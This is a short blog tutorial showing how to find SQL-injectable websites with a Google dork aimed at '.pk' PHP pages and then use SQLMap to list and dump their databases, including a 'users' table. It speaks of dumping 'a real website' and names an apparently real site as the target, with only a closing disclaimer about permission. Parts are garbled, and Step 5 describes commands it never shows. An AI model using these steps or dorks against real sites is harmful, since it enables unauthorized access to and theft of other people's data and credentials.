How to Dump a Database Using SQLMap

Pankaj Kumar

Introduction

In this blog we will see how we can dump the database of a vulnerable website using SQLMap. SQLMap is a powerful automated SQL injection tool used by both hackers and security researchers. So let’s go to dump the database of a real website with practical(for educational purpose!)

Lab Environment:

To carry out Practical, you need
Kali linux os/parrot os
Internet connection
Root permission to run the tools

Step 1: Install SQLMap:

If Sqlmp is not already installed on your system,you can install it.

Linux & Mac:
sudo apt install sqlmap #Debian-based (Ubuntu, Kali linux)

Step 2: find Vulnerable Website

Sql injection is possible only when the input validation of a website is weak. Mostly vulnerable URLs are like this.

http://target.com/index.php?id=1

if it accepts URL parameter manipulation, the chances of sql injection increase.

site:pk inurl:php?Id=” This is the google dorks to find the vulnerable website URLs.

Step 3:SQL injection Test karein

Now you have to use sqlmap to test the website is vulnerable or not.
Run the command:

sqlmap -u “http://targed.com/index.php?id=1” –dbs

This command mins:

  • -u =Specify Target URL
  • –dbs = Show available database

If the website is vulnerable, then it will show the available databases. And if it is not vulnerable then it will not show the database.

Step 4:Dump database

When you determine that a website is vulnerable, use this command to dump a specific database.

sqlmap -u “http://target.com/index.php?id=1” -D target_database –dump-all

-D target_database = Specifies the name of the target database.

–dump-all = To dump the database of that website

If you want to see the table of the database then use this command.

sqlmap -u “http://target.com/index.php?id=1” -D target_database –tables

in this command:

-D target_database = Specifies the name of the target database

target_database = This is the name of database

–tables = This is use for show the database table

http://target.com/index.php?id=1 = This is the target website URL.

If you need data from a particular table, use this command:

sqlmap -u “http://target.com/index.php?id=1” -D target_database -T users –dump

in this command:

-T users = Targets the users table.

–dump = dump database of the table.

Step 5: show dump data

you can see the dump data using this command

cd = This is the command for change directory

ls = This is the command for list all file or folder

www.af.org.pk = This is the target website name

cat = This is the command for see the file data

Conclusion

SQLMap is a powerful tool which is useful for security testing. But remember that you should not misuse it, dumping the database of any website without permission is illegal. You should use it only for learning and authorized penetration testing!

If you need more tips on ethical hacking and penetration testing, let us know in the comments!

Loading

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *